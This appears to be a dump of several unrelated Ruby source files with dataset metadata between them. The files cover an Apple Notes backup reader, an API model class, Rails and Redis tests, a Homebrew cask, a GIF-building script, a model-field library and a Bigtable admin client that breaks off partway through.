message = "Failed to remove file which is related to corrupted <#{object_path}>: <#{path}>"
$stderr.puts(message)
logger.log_error(message)
end
end
end
end
end
end
end
end
end
| 29.997792 | 111 | 0.525204 |
ab5bc90030036b613863148372eebcb0d11e81a1 | 3,007 | require 'fileutils'
require 'pathname'
require_relative 'AppleBackup.rb'
require_relative 'AppleNote.rb'
require_relative 'AppleNoteStore.rb'
##
# This class represents an Apple backup created by iTunes (i.e. hashed files with a Manifest.db).
# This class will abstract away figuring out how to get the right media files to embed back into an AppleNote.
class AppleBackupHashed < AppleBackup
# attr_accessor :note_stores,
# :root_folder,
# :type,
# :output_folder
##
# Creates a new AppleBackupHashed. Expects a Pathname +root_folder+ that represents the root
# of the backup and a Pathname +output_folder+ which will hold the results of this run.
# Immediately sets the NoteStore database file to be the appropriate hashed file.
def initialize(root_folder, output_folder)
super(root_folder, AppleBackup::HASHED_BACKUP_TYPE, output_folder)
@hashed_backup_manifest_database = nil
# Check to make sure we're all good
if self.valid?
puts "Created a new AppleBackup from iTunes backup: #{@root_folder}"
# Copy the modern NoteStore to our output directory
FileUtils.cp(@root_folder + "4f" + "4f98687d8ab0d6d1a371110e6b7300f6e465bef2", @note_store_modern_location)
modern_note_version = AppleNoteStore.guess_ios_version(@note_store_modern_location)
# Copy the legacy NoteStore to our output directory
FileUtils.cp(@root_folder + "ca" + "ca3bc056d4da0bbf88b5fb3be254f3b7147e639c", @note_store_legacy_location)
legacy_note_version = AppleNoteStore.guess_ios_version(@note_store_legacy_location)
# Copy the Manifest.db to our output directry in case we want to look up files
FileUtils.cp(@root_folder + "Manifest.db", @output_folder + "Manifest.db")
# Create the AppleNoteStore objects
@note_stores.push(AppleNoteStore.new(@note_store_modern_location, self, modern_note_version))
@note_stores.push(AppleNoteStore.new(@note_store_legacy_location, self, legacy_note_version))
@hashed_backup_manifest_database = SQLite3::Database.new((@output_folder + "Manifest.db").to_s, {results_as_hash: true})
end
end
##
# This method returns true if it is a valid backup of the specified type. For a HASHED_BACKUP_TYPE,
# that means it has a Manifest.db at the root level.
def valid?
return (@root_folder.directory? and (@root_folder + "Manifest.db").file?)
end
##
# This method returns a Pathname that represents the location on this disk of the requested file or nil.
# It expects a String +filename+ to look up. For hashed backups, that involves checking Manifest.db
# to get the appropriate hash value.
def get_real_file_path(filename)
@hashed_backup_manifest_database.execute("SELECT fileID FROM Files WHERE relativePath=?", filename) do |row|
tmp_filename = row["fileID"]
tmp_filefolder = tmp_filename[0,2]
return @root_folder + tmp_filefolder + tmp_filename
end
end
end
| 43.57971 | 128 | 0.736282 |
01ebbb76c06a2f2031db7005124ae811b84e3695 | 7,192 | =begin
#Mux API
#Mux is how developers build online video. This API encompasses both Mux Video and Mux Data functionality to help you build your video-related projects better and faster than ever before.
The version of the OpenAPI document: v1
Generated by: https://openapi-generator.tech
OpenAPI Generator version: 5.0.1
=end
require 'date'
require 'time'
module MuxRuby
class ListIncidentsResponse
attr_accessor :data
attr_accessor :total_row_count
attr_accessor :timeframe
# Attribute mapping from ruby-style variable name to JSON key.
def self.attribute_map
{
:'data' => :'data',
:'total_row_count' => :'total_row_count',
:'timeframe' => :'timeframe'
}
end
# Returns all the JSON keys this model knows about
def self.acceptable_attributes
attribute_map.values
end
# Attribute type mapping.
def self.openapi_types
{
:'data' => :'Array<Incident>',
:'total_row_count' => :'Integer',
:'timeframe' => :'Array<Integer>'
}
end
# List of attributes with nullable: true
def self.openapi_nullable
Set.new([
])
end
# Initializes the object
# @param [Hash] attributes Model attributes in the form of hash
def initialize(attributes = {})
if (!attributes.is_a?(Hash))
fail ArgumentError, "The input argument (attributes) must be a hash in `MuxRuby::ListIncidentsResponse` initialize method"
end
# check to see if the attribute exists and convert string to symbol for hash key
attributes = attributes.each_with_object({}) { |(k, v), h|
if (!self.class.attribute_map.key?(k.to_sym))
fail ArgumentError, "`#{k}` is not a valid attribute in `MuxRuby::ListIncidentsResponse`. Please check the name to make sure it's valid. List of attributes: " + self.class.attribute_map.keys.inspect
end
h[k.to_sym] = v
}
if attributes.key?(:'data')
if (value = attributes[:'data']).is_a?(Array)
self.data = value
end
end
if attributes.key?(:'total_row_count')
self.total_row_count = attributes[:'total_row_count']
end
if attributes.key?(:'timeframe')
if (value = attributes[:'timeframe']).is_a?(Array)
self.timeframe = value
end
end
end
# Show invalid properties with the reasons. Usually used together with valid?
# @return Array for valid properties with the reasons
def list_invalid_properties
invalid_properties = Array.new
invalid_properties
end
# Check to see if the all the properties in the model are valid
# @return true if the model is valid
def valid?
true
end
# Checks equality by comparing each attribute.
# @param [Object] Object to be compared
def ==(o)
return true if self.equal?(o)
self.class == o.class &&
data == o.data &&
total_row_count == o.total_row_count &&
timeframe == o.timeframe
end
# @see the `==` method
# @param [Object] Object to be compared
def eql?(o)
self == o
end
# Calculates hash code according to all attributes.
# @return [Integer] Hash code
def hash
[data, total_row_count, timeframe].hash
end
# Builds the object from hash
# @param [Hash] attributes Model attributes in the form of hash
# @return [Object] Returns the model itself
def self.build_from_hash(attributes)
new.build_from_hash(attributes)
end
# Builds the object from hash
# @param [Hash] attributes Model attributes in the form of hash
# @return [Object] Returns the model itself
def build_from_hash(attributes)
return nil unless attributes.is_a?(Hash)
self.class.openapi_types.each_pair do |key, type|
if attributes[self.class.attribute_map[key]].nil? && self.class.openapi_nullable.include?(key)
self.send("#{key}=", nil)
elsif type =~ /\AArray<(.*)>/i
# check to ensure the input is an array given that the attribute
# is documented as an array but the input is not
if attributes[self.class.attribute_map[key]].is_a?(Array)
self.send("#{key}=", attributes[self.class.attribute_map[key]].map { |v| _deserialize($1, v) })
end
elsif !attributes[self.class.attribute_map[key]].nil?
self.send("#{key}=", _deserialize(type, attributes[self.class.attribute_map[key]]))
end
end
self
end
# Deserializes the data based on type
# @param string type Data type
# @param string value Value to be deserialized
# @return [Object] Deserialized data
def _deserialize(type, value)
case type.to_sym
when :Time
Time.parse(value)
when :Date
Date.parse(value)
when :String
value.to_s
when :Integer
value.to_i
when :Float
value.to_f
when :Boolean
if value.to_s =~ /\A(true|t|yes|y|1)\z/i
true
else
false
end
when :Object
# generic object (usually a Hash), return directly
value
when /\AArray<(?<inner_type>.+)>\z/
inner_type = Regexp.last_match[:inner_type]
value.map { |v| _deserialize(inner_type, v) }
when /\AHash<(?<k_type>.+?), (?<v_type>.+)>\z/
k_type = Regexp.last_match[:k_type]
v_type = Regexp.last_match[:v_type]
{}.tap do |hash|
value.each do |k, v|
hash[_deserialize(k_type, k)] = _deserialize(v_type, v)
end
end
else # model
# models (e.g. Pet) or oneOf
klass = MuxRuby.const_get(type)
klass.respond_to?(:openapi_one_of) ? klass.build(value) : klass.build_from_hash(value)
end
end
# Returns the string representation of the object
# @return [String] String presentation of the object
def to_s
to_hash.to_s
end
# to_body is an alias to to_hash (backward compatibility)
# @return [Hash] Returns the object in the form of hash
def to_body
to_hash
end
# Returns the object in the form of hash
# @return [Hash] Returns the object in the form of hash
def to_hash
hash = {}
self.class.attribute_map.each_pair do |attr, param|
value = self.send(attr)
if value.nil?
is_nullable = self.class.openapi_nullable.include?(attr)
next if !is_nullable || (is_nullable && !instance_variable_defined?(:"@#{attr}"))
end
hash[param] = _to_hash(value)
end
hash
end
# Outputs non-array value in the form of hash
# For object, use to_hash. Otherwise, just return the value
# @param [Object] value Any valid value
# @return [Hash] Returns the value in the form of hash
def _to_hash(value)
if value.is_a?(Array)
value.compact.map { |v| _to_hash(v) }
elsif value.is_a?(Hash)
{}.tap do |hash|
value.each { |k, v| hash[k] = _to_hash(v) }
end
elsif value.respond_to? :to_hash
value.to_hash
else
value
end
end
end
end
| 29.842324 | 208 | 0.622219 |
bfecc38f7e4fac1ccd41902a34b3672ceabb1723 | 919 | require 'test_helper'
class CalendarControllerTest < ActionController::TestCase
setup do
@trip = trips(:trip_one)
@user= users(:user_one)
end
test "should get ics" do
assert_recognizes({:controller => 'calendar', :action => 'ics', "user_email"=>"*user_email", "user_token"=>"*user_token", "format"=>"ics"}, '/calendar/*user_email/*user_token.ics')
get :ics, "user_email"=>@user.email, "user_token"=>@user.authentication_token, "format"=>"ics"
assert_response :success
assert response.headers['Content-Type']== "text/calendar"
end
test "should get html" do
assert_recognizes({:controller => 'calendar', :action => 'ics', "user_email"=>"*user_email", "user_token"=>"*user_token", "format"=>"html"}, '/calendar/*user_email/*user_token.html')
get :ics, "user_email"=>@user.email, "user_token"=>@user.authentication_token, "format"=>"html"
assert_response :success
end
end
| 41.772727 | 186 | 0.68988 |
1c51afba9c0a5a88096feb554ca63bcdeaad5fdf | 464 | cask :v1 => 'google-earth' do
version :latest
sha256 :no_check
url 'https://dl.google.com/earth/client/advanced/current/GoogleEarthMac-Intel.dmg'
homepage 'https://www.google.com/earth/'
license :unknown
app 'Google Earth.app'
zap :delete => [
'~/Library/Application Support/Google Earth',
'~/Library/Caches/Google Earth',
'~/Library/Caches/com.Google.GoogleEarthPlus',
]
end
| 27.294118 | 84 | 0.609914 |
ab8daa0579f6e1c697215defaed0e20850aca0a0 | 1,282 | #!/usr/bin/ruby
gem 'json'
require 'json'
require 'fileutils'
$tmp = "tmp"
if ARGV.size < 1
puts "Pass the gifspec!"
Process.exit
end
if !File.exist?(ARGV[0])
puts "File '#{ARGV[0]}' does not exist!"
Process.exit
end
# Load and parse gifspec
spec = nil
File.open(ARGV[0], "r") { |f|
spec = JSON.parse(f.read)
}
if spec.nil? || spec.empty?
puts "No JSON in '#{ARGV[0]}'!"
Process.exit
end
# Assemble image preprocessing parameters
# wxh{+-}x{+-}y
crop=""
if !spec["crop"].nil?
crop = spec["crop"]["width"].to_s + "x" +
spec["crop"]["height"].to_s +
"+" + spec["crop"]["x"].to_s +
"+" + spec["crop"]["y"].to_s
crop = "-crop #{crop}"
end
# wxh
resize = spec["size"]["width"].to_s + "x" +
spec["size"]["height"].to_s
# Preprocess images
FileUtils::mkdir_p("tmp")
spec["sequence"].map { |e|
e["file"]
}.each { |file|
`convert "#{file}" #{crop} -resize "#{resize}" "#{$tmp}/#{file}"`
}
# Assemble image sequence
sequence = spec["sequence"].map { |e|
Array.new(e["repeat"], e["file"])
}.flatten.map { |f|
"\"#{$tmp}/#{f}\""
}.join(" ")
# Create GIF
`convert -delay #{spec["delay"]}x100 #{sequence} -loop #{spec["loop"]} "#{ARGV[0].sub(/\.[^.]+$/, ".gif")}"`
FileUtils::rm_rf($tmp)
| 18.57971 | 108 | 0.549142 |
accf540eca58aaa9116d02778ac0c0f6e11dddf4 | 6,557 | require "test_helper"
include CarrierWaveDirect::Test::Helpers
class SettingsControllerTest < ActionController::TestCase
setup do
@user = users(:ben)
end
test "should get settings" do
login_as @user
get :settings
assert_response :success
end
test "should get account" do
login_as @user
get :account
assert_response :success
end
test "should get account @last_payment" do
StripeMock.start
event = StripeMock.mock_webhook_event("charge.succeeded", {customer: @user.customer_id})
BillingEvent.create(info: event.as_json)
login_as @user
get :account
assert_response :success
assert assigns(:last_payment).present?, "@last_payment should exist"
StripeMock.stop
end
test "should not get account @last_payment because it is too old" do
StripeMock.start
event = StripeMock.mock_webhook_event("charge.succeeded", {customer: @user.customer_id})
BillingEvent.create(info: event.as_json).update(created_at: 8.days.ago)
login_as @user
get :account
assert_response :success
assert_nil assigns(:last_payment)
StripeMock.stop
end
test "should get appearance" do
login_as @user
get :appearance
assert_response :success
end
test "should get billing" do
StripeMock.start
events = [
StripeMock.mock_webhook_event("charge.succeeded", {customer: @user.customer_id}),
StripeMock.mock_webhook_event("invoice.payment_succeeded", {customer: @user.customer_id}),
]
events.each do |event|
BillingEvent.create(info: event.as_json)
end
login_as @user
get :billing
assert_response :success
assert_not_nil assigns(:next_payment_date)
assert assigns(:billing_events).present?
StripeMock.stop
end
test "should get import_export" do
login_as @user
get :import_export
assert_response :success
end
test "should import" do
login_as @user
skip "Figure out how to test CarrierWave direct"
get :import_export, params: {key: sample_key(ImportUploader.new, base: "test.opml")}
assert_redirected_to settings_import_export_url
end
test "should update plan" do
StripeMock.start
stripe_helper = StripeMock.create_test_helper
plans = {
original: plans(:basic_monthly_3),
new: plans(:basic_yearly_3),
}
plans.each do |_, plan|
create_stripe_plan(plan)
end
customer = Stripe::Customer.create({email: @user.email, plan: plans[:original].stripe_id, source: stripe_helper.generate_card_token})
@user.update(customer_id: customer.id)
@user.reload.inspect
login_as @user
post :update_plan, params: {plan: plans[:new].id}
assert_equal plans[:new], @user.reload.plan
StripeMock.stop
end
test "should update credit card" do
StripeMock.start
plan = plans(:trial)
last4 = "1234"
card_1 = StripeMock.generate_card_token(last4: "4242", exp_month: 99, exp_year: 3005)
card_2 = StripeMock.generate_card_token(last4: last4, exp_month: 99, exp_year: 3005)
create_stripe_plan(plan)
user = User.create(
email: "[email protected]",
password: default_password,
plan: plan,
)
user.stripe_token = card_1
user.save
login_as user
post :update_credit_card, params: {stripe_token: card_2}
assert_redirected_to settings_billing_url
customer = Stripe::Customer.retrieve(user.customer_id)
assert_equal last4, customer.sources.data.first.last4
StripeMock.stop
end
test "should update settings" do
login_as @user
settings = [
:entry_sort, :starred_feed_enabled, :precache_images,
:show_unread_count, :sticky_view_inline, :mark_as_read_confirmation,
:apple_push_notification_device_token, :receipt_info, :entries_display,
:entries_feed, :entries_time, :entries_body, :ui_typeface, :theme,
:hide_recently_read, :hide_updated, :disable_image_proxy, :entries_image,
].each_with_object({}) { |setting, hash| hash[setting.to_s] = "1" }
patch :settings_update, params: {id: @user, user: settings}
assert_redirected_to settings_url
assert_equal settings, @user.reload.settings
end
test "should update view settings" do
login_as @user
tag = @user.feeds.first.tag("tag", @user).first.tag
params = {
id: @user,
tag_visibility: true,
tag: tag.id,
column_widths: true,
column: "test",
width: 1234,
}
patch :view_settings_update, params: params
assert_equal({tag.id.to_s => true}, @user.reload.tag_visibility)
assert_response :success
assert_equal session[:column_widths], {params[:column] => params[:width].to_s}
end
test "should increase font" do
@user.font_size = 7
@user.save
login_as @user
post :font_increase
assert_response :success
assert_equal (@user.font_size.to_i + 1).to_s, @user.reload.font_size
end
test "should decrease font" do
@user.font_size = 7
@user.save
login_as @user
post :font_decrease
assert_response :success
assert_equal (@user.font_size.to_i - 1).to_s, @user.reload.font_size
end
test "should change font" do
login_as @user
post :font, params: {font: Feedbin::Application.config.fonts.values.last}
assert_equal @user.reload.font, Feedbin::Application.config.fonts.values.last
end
test "should change theme" do
login_as @user
["day", "night", "sunset"].each do |theme|
post :theme, params: {theme: theme}
assert_equal(theme, @user.reload.theme)
end
end
test "should change entry width" do
login_as @user
post :entry_width
assert_not_equal @user.entry_width, @user.reload.entry_width
end
test "should update now playing" do
@feeds = create_feeds(@user)
@entries = @user.entries
login_as @user
post :now_playing, params: {now_playing_entry: @entries.first.id}
assert_not_equal @entries.first.id, @user.reload.now_playing_entry.to_s
end
test "should remove now playing" do
login_as @user
now_playing_entry = "1"
@user.update(now_playing_entry: now_playing_entry)
assert_equal @user.reload.now_playing_entry, now_playing_entry
post :now_playing, params: {remove_now_playing_entry: 1}
assert_nil @user.reload.now_playing_entry
end
test "should change audio panel size" do
login_as @user
%w[minimized maximized].each do |audio_panel_size|
post :audio_panel_size, params: {audio_panel_size: audio_panel_size}
assert_equal(audio_panel_size, @user.reload.audio_panel_size)
end
end
end
| 28.633188 | 137 | 0.706573 |
08247c716d6a6cd60568174b9258aa8fd77f92d0 | 5,713 | # coding: utf-8
RSpec.shared_examples "hashes" do
context "hget" do
context "when the hash doesn't exist" do
it "returns nil" do
expect(
redis.hget("foo","bar")
).to eql(nil)
end
end
context "when the hash exists with a single field" do
before do
redis.hset("foo", "bar","1")
end
context "requesting that field" do
it "returns the value" do
expect(
redis.hget("foo", "bar")
).to eql("1")
end
end
context "requesting a field that doesn't exist" do
it "returns nil" do
expect(
redis.hget("foo", "aaa")
).to eql(nil)
end
end
end
context "when the hash exists with a single field but it's expired" do
before do
redis.hset("foo", "bar", "10")
redis.expire("foo", 1) # TODO change this to pexpire
sleep(1.1)
end
it "returns nil" do
expect(
redis.hget("foo", "bar")
).to eql(nil)
end
end
end
context "hgetall" do
context "when the hash doesn't exist" do
it "returns an empty array" do
expect(
redis.hgetall("foo")
).to eql({})
end
end
context "when the hash exists with two fields" do
before do
redis.hset("foo", "bar","1")
redis.hset("foo", "baz","2")
end
context "requesting all values" do
it "returns the fields and values in an array" do
expect(
redis.hgetall("foo")
).to eql({"bar" => "1", "baz" => "2"})
end
end
end
context "when the hash exists with a single field but it's expired" do
before do
redis.hset("foo", "bar", "1")
redis.expire("foo", 1) # TODO change this to pexpire
sleep(1.1)
end
it "returns an empty array" do
expect(
redis.hgetall("foo")
).to eql({})
end
end
end
context "hmget" do
context "when the hash doesn't exist" do
it "returns an array with nil" do
expect(
redis.hmget("foo","bar")
).to eql([nil])
end
end
context "when the hash exists with two fields field" do
before do
redis.hset("foo", "bar","1")
redis.hset("foo", "baz","2")
end
context "requesting both fields" do
it "returns an array with the values" do
expect(
redis.hmget("foo", "bar", "baz")
).to eql(["1","2"])
end
end
context "requesting a field that doesn't exist" do
it "returns an array with the values or nil" do
expect(
redis.hmget("foo", "aaa", "bar")
).to eql([nil,"1"])
end
end
end
context "when the hash exists with a single field but it's expired" do
before do
redis.hset("foo", "bar", "10")
redis.expire("foo", 1) # TODO change this to pexpire
sleep(1.1)
end
it "returns an array with nil" do
expect(
redis.hmget("foo", "bar")
).to eql([nil])
end
end
end
context "hset" do
context "when the hash doesn't exist" do
it "returns 0" do
expect(
redis.hset("foo","bar","1")
).to eql(true)
end
it "creates the hash on demand" do
redis.hset("foo","bar","1")
expect(
redis.hgetall("foo")
).to eql({"bar" => "1"})
end
end
context "when the hash exists with a single field" do
before do
redis.hset("foo", "bar","1")
end
context "adding a new field" do
it "returns 1" do
expect(
redis.hset("foo", "baz", "2")
).to eql(true)
end
it "adds the field to the hash" do
redis.hset("foo", "baz", "2")
expect(
redis.hgetall("foo")
).to eql({"bar" => "1", "baz" => "2"})
end
end
context "updating an existing field" do
it "returns 0" do
expect(
redis.hset("foo", "bar", "2")
).to eql(false)
end
it "updates the field" do
redis.hset("foo", "bar", "2")
expect(
redis.hgetall("foo")
).to eql({"bar" => "2"})
end
end
end
context "hmset" do
context "when the hash doesn't exist" do
it "returns 'OK'" do
expect(
redis.hmset("foo","bar","1")
).to eql("OK")
end
it "creates the hash on demand" do
redis.hmset("foo","bar","1")
expect(
redis.hgetall("foo")
).to eql({"bar" => "1"})
end
end
context "when the hash exists with a single field" do
before do
redis.hset("foo", "bar","1")
end
context "adding two new fields" do
it "returns OK" do
expect(
redis.hmset("foo", "aaa", "2", "bbb", "3")
).to eql("OK")
end
it "adds the field to the hash" do
redis.hmset("foo", "aaa", "2", "bbb", "3")
expect(
redis.hgetall("foo")
).to eql({"bar" => "1", "aaa" => "2", "bbb" => "3"})
end
end
context "updating an existing field" do
it "returns OK" do
expect(
redis.hmset("foo", "bar", "2")
).to eql("OK")
end
it "updates the field" do
redis.hmset("foo", "bar", "2")
expect(
redis.hgetall("foo")
).to eql({"bar" => "2"})
end
end
end
end
end
end
| 25.968182 | 74 | 0.479783 |
ac36462c53082a9afab9e64567c370b68b29970c | 6,576 | module Gorillib
module Model
# Represents a field for reflection
#
# @example Usage
# Gorillib::Model::Field.new(:name => 'problems', type => Integer, :doc => 'Count of problems')
#
#
class Field
include Gorillib::Model
remove_possible_method(:type)
# [Gorillib::Model] Model owning this field
attr_reader :model
# [Hash] all options passed to the field not recognized by one of its own current fields
attr_reader :_extra_attributes
# Note: `Gorillib::Model::Field` is assembled in two pieces, so that it
# can behave as a model itself. Defining `name` here, along with some
# fudge in #initialize, provides enough functionality to bootstrap.
# The fields are then defined properly at the end of the file.
attr_reader :name
attr_reader :type
class_attribute :visibilities, :instance_writer => false
self.visibilities = { :reader => :public, :writer => :public, :receiver => :public, :tester => false }
# @param [#to_sym] name Field name
# @param [#receive] type Factory for field values. To accept any object as-is, specify `Object` as the type.
# @param [Gorillib::Model] model Field's owner
# @param [Hash{Symbol => Object}] options Extended attributes
# @option options [String] doc Description of the field's purpose
# @option options [true, false, :public, :protected, :private] :reader Visibility for the reader (`#foo`) method; `false` means don't create one.
# @option options [true, false, :public, :protected, :private] :writer Visibility for the writer (`#foo=`) method; `false` means don't create one.
# @option options [true, false, :public, :protected, :private] :receiver Visibility for the receiver (`#receive_foo`) method; `false` means don't create one.
#
def initialize(model, name, type, options={})
Validate.identifier!(name)
type_opts = options.extract!(:blankish, :empty_product, :items, :keys, :of)
type_opts[:items] = type_opts.delete(:of) if type_opts.has_key?(:of)
#
@model = model
@name = name.to_sym
@type = Gorillib::Factory.factory_for(type, type_opts)
default_visabilities = visibilities
@visibilities = default_visabilities.merge( options.extract!(*default_visabilities.keys) )
@doc = options.delete(:name){ "#{name} field" }
receive!(options)
end
# __________________________________________________________________________
# @return [String] the field name
def to_s
name.to_s
end
# @return [String] Human-readable presentation of the field definition
def inspect
args = [name.inspect, type.to_s, attributes.reject{|k,v| k =~ /^(name|type)$/}.inspect[1..-2] ]
"field(#{args.join(", ")})"
end
def inspect_compact
"field(#{name})"
end
def to_hash
attributes.merge!(@visibility).merge!(@_extra_attributes)
end
def ==(val)
super && (val._extra_attributes == self._extra_attributes) && (val.model == self.model)
end
def self.receive(hsh)
name = hsh.fetch(:name)
type = hsh.fetch(:type)
model = hsh.fetch(:model)
new(model, name, type, hsh)
end
#
# returns the visibility
#
# @example reader is protected, no writer:
# Foo.field :granuloxity, :reader => :protected, :writer => false
#
def visibility(meth_type)
Validate.included_in!("method type", meth_type, @visibilities.keys)
@visibilities[meth_type]
end
protected
#
#
#
def inscribe_methods(model)
model.__send__(:define_attribute_reader, self.name, self.type, visibility(:reader))
model.__send__(:define_attribute_writer, self.name, self.type, visibility(:writer))
model.__send__(:define_attribute_tester, self.name, self.type, visibility(:tester))
model.__send__(:define_attribute_receiver, self.name, self.type, visibility(:receiver))
end
public
#
# Now we can construct the actual fields.
#
field :position, Integer, :tester => true, :doc => "Indicates this is a positional initialization arg -- you can pass it as a plain value in the given slot to #initialize"
# Name of this field. Must start with `[A-Za-z_]` and subsequently contain only `[A-Za-z0-9_]` (required)
# @macro [attach] field
# @attribute $1
# @return [$2] the $1 field $*
field :name, String, position: 0, writer: false, doc: "The field name. Must start with `[A-Za-z_]` and subsequently contain only `[A-Za-z0-9_]` (required)"
field :type, Class, position: 1, doc: "Factory to generate field's values"
field :doc, String, doc: "Field's description"
# remove the attr_reader method (needed for scaffolding), leaving the meta_module method to remain
remove_possible_method(:name)
end
class SimpleCollectionField < Gorillib::Model::Field
field :item_type, Class, default: Whatever, doc: "Factory for collection items"
# field :collection_attrs, Hash, default: Hash.new, doc: "Extra attributes to pass to the collection on creation -- eg. key_method"
def initialize(model, name, type, options={})
super
collection_type = self.type
item_type = self.item_type
key_method = options[:key_method] if options[:key_method]
raise "Please supply an item type for #{self.inspect} -- eg 'collection #{name.inspect}, of: FooClass'" unless item_type
self.default ||= ->{ collection_type.new(item_type: item_type, belongs_to: self, key_method: key_method) }
end
def inscribe_methods(model)
super
model.__send__(:define_collection_receiver, self)
end
end
end
end
# * aliases
# * order
# * dirty
# * lazy
# * mass assignable
# * identifier / index
# * hook
# * validates / required
# - presence => true
# - uniqueness => true
# - numericality => true # also :==, :>, :>=, :<, :<=, :odd?, :even?, :equal_to, :less_than, etc
# - length => { :< => 7 } # also :==, :>=, :<=, :is, :minimum, :maximum
# - format => { :with => /.*/ }
# - inclusion => { :in => [1,2,3] }
# - exclusion => { :in => [1,2,3] }
| 38.911243 | 183 | 0.612378 |
ab07461dfbcff032d880a4f33b793f014ed4f351 | 143,308 | # frozen_string_literal: true
# Copyright 2020 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# https://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# Auto-generated by gapic-generator-ruby. DO NOT EDIT!
require "google/cloud/errors"
require "google/bigtable/admin/v2/bigtable_instance_admin_pb"
module Google
module Cloud
module Bigtable
module Admin
module V2
module BigtableInstanceAdmin
##
# Client for the BigtableInstanceAdmin service.
#
# Service for creating, configuring, and deleting Cloud Bigtable Instances and
# Clusters. Provides access to the Instance and Cluster schemas only, not the
# tables' metadata or data stored in those tables.
#
class Client
include Paths
# @private
attr_reader :bigtable_instance_admin_stub
##
# Configure the BigtableInstanceAdmin Client class.
#
# See {::Google::Cloud::Bigtable::Admin::V2::BigtableInstanceAdmin::Client::Configuration}
# for a description of the configuration fields.
#
# @example
#
# # Modify the configuration for all BigtableInstanceAdmin clients
# ::Google::Cloud::Bigtable::Admin::V2::BigtableInstanceAdmin::Client.configure do |config|
# config.timeout = 10.0
# end
#
# @yield [config] Configure the Client client.
# @yieldparam config [Client::Configuration]
#
# @return [Client::Configuration]
#
def self.configure
@configure ||= begin
namespace = ["Google", "Cloud", "Bigtable", "Admin", "V2"]
parent_config = while namespace.any?
parent_name = namespace.join "::"
parent_const = const_get parent_name
break parent_const.configure if parent_const.respond_to? :configure
namespace.pop
end
default_config = Client::Configuration.new parent_config
default_config.rpcs.create_instance.timeout = 300.0
default_config.rpcs.get_instance.timeout = 60.0
default_config.rpcs.get_instance.retry_policy = {
initial_delay: 1.0, max_delay: 60.0, multiplier: 2, retry_codes: [14, 4]
}
default_config.rpcs.list_instances.timeout = 60.0
default_config.rpcs.list_instances.retry_policy = {
initial_delay: 1.0, max_delay: 60.0, multiplier: 2, retry_codes: [14, 4]
}
default_config.rpcs.update_instance.timeout = 60.0
default_config.rpcs.update_instance.retry_policy = {
initial_delay: 1.0, max_delay: 60.0, multiplier: 2, retry_codes: [14, 4]
}
default_config.rpcs.partial_update_instance.timeout = 60.0
default_config.rpcs.partial_update_instance.retry_policy = {
initial_delay: 1.0, max_delay: 60.0, multiplier: 2, retry_codes: [14, 4]
}
default_config.rpcs.delete_instance.timeout = 60.0
default_config.rpcs.create_cluster.timeout = 60.0
default_config.rpcs.get_cluster.timeout = 60.0
default_config.rpcs.get_cluster.retry_policy = {
initial_delay: 1.0, max_delay: 60.0, multiplier: 2, retry_codes: [14, 4]
}
default_config.rpcs.list_clusters.timeout = 60.0
default_config.rpcs.list_clusters.retry_policy = {
initial_delay: 1.0, max_delay: 60.0, multiplier: 2, retry_codes: [14, 4]
}
default_config.rpcs.update_cluster.timeout = 60.0
default_config.rpcs.update_cluster.retry_policy = {
initial_delay: 1.0, max_delay: 60.0, multiplier: 2, retry_codes: [14, 4]
}
default_config.rpcs.delete_cluster.timeout = 60.0
default_config.rpcs.create_app_profile.timeout = 60.0
default_config.rpcs.get_app_profile.timeout = 60.0
default_config.rpcs.get_app_profile.retry_policy = {
initial_delay: 1.0, max_delay: 60.0, multiplier: 2, retry_codes: [14, 4]
}
default_config.rpcs.list_app_profiles.timeout = 60.0
default_config.rpcs.list_app_profiles.retry_policy = {
initial_delay: 1.0, max_delay: 60.0, multiplier: 2, retry_codes: [14, 4]
}
default_config.rpcs.update_app_profile.timeout = 60.0
default_config.rpcs.update_app_profile.retry_policy = {
initial_delay: 1.0, max_delay: 60.0, multiplier: 2, retry_codes: [14, 4]
}
default_config.rpcs.delete_app_profile.timeout = 60.0
default_config.rpcs.get_iam_policy.timeout = 60.0
default_config.rpcs.get_iam_policy.retry_policy = {
initial_delay: 1.0, max_delay: 60.0, multiplier: 2, retry_codes: [14, 4]
}
default_config.rpcs.set_iam_policy.timeout = 60.0
default_config.rpcs.test_iam_permissions.timeout = 60.0
default_config.rpcs.test_iam_permissions.retry_policy = {
initial_delay: 1.0, max_delay: 60.0, multiplier: 2, retry_codes: [14, 4]
}
default_config.rpcs.list_hot_tablets.timeout = 60.0
default_config.rpcs.list_hot_tablets.retry_policy = {
initial_delay: 1.0, max_delay: 60.0, multiplier: 2, retry_codes: [14, 4]
}
default_config
end
yield @configure if block_given?
@configure
end
##
# Configure the BigtableInstanceAdmin Client instance.
#
# The configuration is set to the derived mode, meaning that values can be changed,
# but structural changes (adding new fields, etc.) are not allowed. Structural changes
# should be made on {Client.configure}.
#
# See {::Google::Cloud::Bigtable::Admin::V2::BigtableInstanceAdmin::Client::Configuration}
# for a description of the configuration fields.
#
# @yield [config] Configure the Client client.
# @yieldparam config [Client::Configuration]
#
# @return [Client::Configuration]
#
def configure
yield @config if block_given?
@config
end
##
# Create a new BigtableInstanceAdmin client object.
#
# @example
#
# # Create a client using the default configuration
# client = ::Google::Cloud::Bigtable::Admin::V2::BigtableInstanceAdmin::Client.new
#
# # Create a client using a custom configuration
# client = ::Google::Cloud::Bigtable::Admin::V2::BigtableInstanceAdmin::Client.new do |config|
# config.timeout = 10.0
# end
#
# @yield [config] Configure the BigtableInstanceAdmin client.
# @yieldparam config [Client::Configuration]
#
def initialize
# These require statements are intentionally placed here to initialize
# the gRPC module only when it's required.
# See https://github.com/googleapis/toolkit/issues/446
require "gapic/grpc"
require "google/bigtable/admin/v2/bigtable_instance_admin_services_pb"
# Create the configuration object
@config = Configuration.new Client.configure
# Yield the configuration if needed
yield @config if block_given?
# Create credentials
credentials = @config.credentials
# Use self-signed JWT if the endpoint is unchanged from default,
# but only if the default endpoint does not have a region prefix.
enable_self_signed_jwt = @config.endpoint == Client.configure.endpoint &&
[email protected](".").first.include?("-")
credentials ||= Credentials.default scope: @config.scope,
enable_self_signed_jwt: enable_self_signed_jwt
if credentials.is_a?(::String) || credentials.is_a?(::Hash)
credentials = Credentials.new credentials, scope: @config.scope
end
@quota_project_id = @config.quota_project
